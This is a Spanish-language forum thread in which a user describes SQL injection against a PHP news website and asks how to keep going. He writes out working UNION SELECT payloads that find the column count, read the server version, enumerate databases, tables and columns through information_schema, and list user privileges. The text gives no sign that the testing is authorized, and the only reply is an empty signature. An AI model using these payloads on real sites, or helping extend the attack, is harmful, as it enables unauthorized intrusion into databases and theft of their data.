Inyección en sistema de noticias

Iniciado por Servia, 21 Marzo 2010, 10:09 AM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

Servia

21 Marzo 2010, 10:09 AM Ultima modificación: 21 Marzo 2010, 10:53 AM por Servia
Hola, me ha dado por probar un sistema de noticias en php y he empezado a hacer pruebas y creo que estoy dando con algo

Cuando se visualiza una noticia con normalidad:


Cuando se intenta visualizar una noticia que no existe (una id.)

(Fijarse que la comilla y los // son de cuando Nota de Prensa, Algún Sitio (ejemplo)) - 1/02/2009


He hecho union all select y llego hasta el 11 o sea que la tabla noticias tiene 11 campos y como se puede ver si genero un error, uno de ellos como no es el id.
Cuando hago -1 union all select 1,2,3,4,5,6,7,8,9,10,11--
Me sale esto:



Si pongo en vez de 1,2,3...  1,@@version,3.... me sale la versión del servidor en el primer numero:
15.0.77

He usado esto para ver las columnas:
-1 union all select 1,concat(table_schema,0x3a,table_name,0x3a,column_name),3,4,5,6,7,8,9,10,11 FROM information_schema.columns--

y me muestra esto


Si hago esto para ver las dbs:
-1 union all select 1,schema_name,3,4,5,6,7,8,9,10,11 FROM information_schema.schemata--

Me sale esto:


He intentado ver una lista de privilegios con:
-1 union all select 1,concat(grantee,privilege_type,is_grantable),3,4,5,6,7,8,9,10,11  FROM+information_schema.user_privileges--

Sale esto:


Usando el PonyMagic (que maravilla por dios.) me indica que tiene 2 tablas y una de ellas es la de noticias y me indica todos los campos.

Con esto que se puedo hacer algo? Como sigo adelante sino?

Shell Root

#1
21 Marzo 2010, 19:51 PM
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
Imprimir
Ir Arriba Páginas1
Acciones del Usuario